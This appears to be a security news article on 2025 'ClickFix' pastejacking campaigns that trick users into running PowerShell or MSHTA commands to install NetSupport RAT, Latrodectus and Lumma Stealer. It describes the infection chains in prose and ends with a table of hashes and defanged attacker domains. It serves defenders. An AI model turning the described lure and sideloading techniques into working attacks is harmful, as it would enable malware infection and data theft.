A new wave of malware delivery campaigns leveraging the “ClickFix” social engineering technique is causing alarm across cybersecurity circles in 2025.
Multiple threat actors are actively exploiting this method to distribute remote access tools (RATs) and infostealers, notably NetSupport RAT, Latrodectus, and Lumma Stealer, across diverse industries such as technology, finance, manufacturing, retail, legal, utilities, and government.
Security researchers at Palo Alto Networks’ Unit 42 have tracked nearly a dozen incidents where ClickFix lures served as the initial access vector, underscoring the growing threat posed by this approach.
Deceptive Fixes Enable Full Compromise
Unlike conventional phishing or drive-by downloads, ClickFix attacks depend on user participation.
Attackers pose as legitimate technical support or product verification systems, urgently advising users to perform “quick fixes” for common issues via simple step-by-step instructions.
Victims are directed to use their keyboard shortcuts such as Windows Key + R or Win+Xto open the Run dialog or terminal window and paste clipboard contents, which unbeknownst to them are malicious PowerShell or MSHTA commands injected by evil JavaScript.
This “pastejacking” ploy tricks targets into executing malware loaders directly, bypassing many traditional detection mechanisms since there’s no malicious attachment or obvious exploit involved.
Recent campaigns have demonstrated significant innovation, with threat actors delivering a range of payloads through compromised websites, malvertising, and fake support forums.
Researchers identified that these techniques are being integrated into infection chains of high-profile malware families, namely NetSupport RAT, Latrodectus, and Lumma Stealer, to devastating effect.
Lumma Stealer Campaigns Escalate
Research reveals that NetSupport RAT operators, active in May 2025, are deploying their malware using fake-verification landing pages spoofing brands such as DocuSign and Okta.
Victims are lured into running malicious PowerShell via ClickFix, which downloads multi-stage payloads starting with a ZIP archive containing a legitimate Java component (jp2launcher.exe) that subsequently sideloads a new malicious DLL loader (msvcp140.dll), ultimately installing NetSupport RAT for remote control and data exfiltration.
Latrodectus actors, active since March 2025, have switched towards ClickFix for initial access, with infection chains initiated by compromised sites redirecting users through ClearFake JavaScript frameworks.
This tactic places fake verification windows prompting users to paste and run clipboard content, after which a myopic PowerShell/cURL command downloads and executes an obfuscated JavaScript dropper.
The workflow ultimately deploys Latrodectus as a malicious DLL, loaded via sideloading into a legitimate process.
Similarly, Lumma Stealer campaigns have accelerated, with a marked increase in attempts traced to April 2025.
These operations focus on delivering unique MSHTA commands for each target, which direct execution to typosquatted IP logging and C2 domains.
The subsequent PowerShell script downloads a new loader that leverages AutoIt scripting and a Microsoft CAB archive to construct the Lumma Stealer payload.
Security software detection measures, such as searching for process names tied to known EDR and antivirus software, are employed to circumvent protective technologies before deploying the infostealer.
For defenders, detecting ClickFix infections can be challenging due to the lack of traditional indicators.
However, artifacts like suspicious entries in Windows registry’s RunMRU key, anomalous process launches via Win+X and clipboard activity, as well as distinctive telemetry patterns involving explorer.exe, powershell.exe, certutil.exe, mshta.exe, or rundll32.exe, can serve as hunting leads.
Palo Alto Networks points to its suite of products Advanced WildFire, Advanced URL Filtering and DNS Security, Cortex XDR, and XSIAM as effective in mitigating ClickFix threats. Nonetheless, raising user awareness and enacting robust monitoring remains crucial, as attackers continue to refine their approaches.
Indicators of Compromise (IOC)
| Malware | Filename/Description | IOC/Hash/Domain |
|---|---|---|
| Lumma Stealer | PartyContinued.exe | 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef |
| Boat.pst (CAB archive) | 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7 | |
| Malicious domains | iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, pub-*.r2[.]dev, agroeconb[.]live, animatcxju[.]live | |
| Latrodectus | libecf.dll | 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1 |
| C2 URLs | webbs[.]live, diab[.]live, mhbr[.]live, decr[.]live, lexip[.]live, rimz[.]live, byjs[.]live, btco[.]live, izan[.]live, k.veuwb[.]live, r.netluc[.]live, heyues[.]live, mailam[.]live | |
| NetSupport RAT | data_3.bin, data_4.bin | 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D, 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288 |
| msvcp140.dll (loader) | CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527 |
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
